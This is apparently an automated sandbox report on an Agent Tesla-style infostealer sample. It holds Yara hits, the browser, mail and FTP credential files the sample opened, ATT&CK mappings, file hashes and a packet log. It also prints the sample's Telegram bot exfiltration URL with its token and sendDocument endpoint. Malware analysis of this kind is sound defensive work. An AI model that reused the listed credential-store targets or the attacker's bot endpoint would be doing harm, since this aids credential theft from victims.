Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Stealing of Sensitive Information

Source: Yara match | File source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLE
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe PID: 6768, type: MEMORYSTR
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                          Remote Access Functionality

Source: Yara match | File source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLE
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe PID: 6768, type: MEMORYSTR
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 1 Deobfuscate/Decode Files or Information; 1 DLL Side-Loading; Software Packing; Steganography; Compile After Delivery
Credential Access: 2 OS Credential Dumping; 21 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Query Registry; 111 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 24 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; 21 Input Capture; 11 Archive Collected Data; 2 Data from Local System; 1 Clipboard Data; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

Source | Detection | Scanner | Label | Link
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | 100% | Avira | HEUR/AGEN.1305739 |
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | 100% | Joe Sandbox ML | |
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
Source | Detection | Scanner | Label | Link
https://api.telegram | 0% | URL Reputation | safe |
https://account.dyn.com/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://api.telegram.org | 0% | Avira URL Cloud | safe |
https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/ | 0% | Avira URL Cloud | safe |
http://api.telegram.org | 0% | Avira URL Cloud | safe |
https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram | 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://account.dyn.com/ | 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | false | URL Reputation: safe | unknown
https://api.telegram.org | 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003439000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://api.telegram.org | 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/ | 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | true
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1443568
                            Start date and time:2024-05-18 01:35:04 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 46s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 46
                            • Number of non-executed functions: 2
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
Time | Type | Description
19:35:57 | API Interceptor | 12857279x Sleep call for process: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe modified
                                                No context
                                                No created / dropped files found
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):5.0093351523926
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                                                File size:249'856 bytes
                                                MD5:1022eee3d28a81920664b590983aafaa
                                                SHA1:002c1889f8e8ebbf781e3a1edb0985068b2a5b96
                                                SHA256:ccd022fa7f9a0ee0928a7736faed2f9d9123234d209c7fdf9b436776669c4644
                                                SHA512:b2bc0d955f356596f939c0457c367fa79b192237e6a27591e02cf315076afab1908ed3093dda53bd2bcb7dfe20604779b72255e97c52c4c8487c8a50c40d6d4b
                                                SSDEEP:3072:DsUqShjy6yaCYHb+lDzVuXn9Phn755rh4xsnD:DsUqcy6yaCY7+lDzV4PhnTh4e
                                                TLSH:E8340F027E88EB15E5A83E3792EF6D2413B2B0C70633C60B6F49AF5528517825D7E72D
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................. ........@.. .......................@............@................................
                                                Icon Hash:90cececece8e8eb0
                                                Entrypoint:0x43e52e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x661CD820 [Mon Apr 15 07:32:48 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e4d8 | 0x53 | .text
                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40000 | 0x546 | .rsrc
                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x42000 | 0xc | .reloc
                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                 .text | 0x2000 | 0x3c534 | 0x3c600 | 011624d87e0649a90b3b1bf2e00ef64b | False | 0.35819827251552794 | data | 5.020453521983489 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                 .rsrc | 0x40000 | 0x546 | 0x600 | 13710f083c5f6d693011c99ff53d1b71 | False | 0.3971354166666667 | data | 3.993854391184784 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .reloc | 0x42000 | 0xc | 0x200 | 8275738e2c8d184d08335f3833a97f65 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                 RT_VERSION | 0x400a0 | 0x2bc | data | | | 0.43714285714285717
                                                 RT_MANIFEST | 0x4035c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                 DLL | Import
                                                 mscoree.dll | _CorExeMain
                                                 Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                 05/18/24-01:35:57.911306 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49730 | 443 | 192.168.2.4 | 149.154.167.220
                                                May 18, 2024 01:38:37.236131907 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.539403915 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.539441109 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.539604902 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.539627075 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.539753914 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:37.539772987 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.697925091 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:37.738277912 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:38.173115015 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:38.173702002 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:38.173831940 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:38.174245119 CEST44349745149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:38.174258947 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:38.174329042 CEST49745443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:44.673496962 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:44.673583031 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:44.674066067 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:44.677541018 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:44.677615881 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:45.804384947 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:45.804491043 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:45.806083918 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:45.806117058 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:45.806448936 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:45.807766914 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:45.848189116 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.160444975 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.160501003 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.160758972 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.160798073 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.161078930 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.161319971 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.326735020 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.378937006 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.791660070 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.793534040 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:46.793662071 CEST44349746149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:46.793997049 CEST49746443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:48.464720964 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:48.464812040 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:48.464899063 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:48.465337038 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:48.465367079 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.547055006 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.547207117 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.549500942 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.549554110 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.549917936 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.557539940 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.604125023 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.910444021 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.910530090 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.910826921 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.910913944 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:49.911259890 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:49.911329985 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:50.061837912 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:50.113317966 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:50.523686886 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:50.524452925 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:50.524566889 CEST44349747149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:50.524779081 CEST49747443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:56.956126928 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:56.956176043 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:56.956365108 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:56.959417105 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:56.959434032 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.066082954 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.066143036 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.068530083 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.068540096 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.068789959 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.070900917 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.116128922 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.425928116 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.425956011 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.426037073 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.426044941 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.426125050 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:58.426140070 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.936476946 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:58.989415884 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:59.245271921 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:59.248157978 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:59.248215914 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:59.248452902 CEST44349748149.154.167.220192.168.2.4
                                                May 18, 2024 01:38:59.248693943 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:38:59.248693943 CEST49748443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:03.393627882 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:03.393665075 CEST44349749149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:03.393989086 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:03.394212961 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:03.394222975 CEST44349749149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.293181896 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.293236017 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.293292046 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.295393944 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.295411110 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.301446915 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.348120928 CEST44349749149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.532150984 CEST44349749149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:04.532207012 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:04.532218933 CEST49749443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.516967058 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.517059088 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.518656969 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.518667936 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.518867970 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.520809889 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.568110943 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.878987074 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.879020929 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.879091978 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.879106045 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:05.879179955 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:05.879273891 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:06.037580013 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:06.081942081 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:06.498903036 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:06.499470949 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:06.499521971 CEST44349750149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:06.499588966 CEST49750443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:22.015482903 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:22.015512943 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:22.015706062 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:22.019402027 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:22.019417048 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.130584002 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.130657911 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.132775068 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.132785082 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.133117914 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.134525061 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.180104971 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.488487005 CEST49751443192.168.2.4149.154.167.220
                                                May 18, 2024 01:39:23.488534927 CEST44349751149.154.167.220192.168.2.4
                                                May 18, 2024 01:39:23.488703966 CEST49751443192.168.2.4149.154.167.220
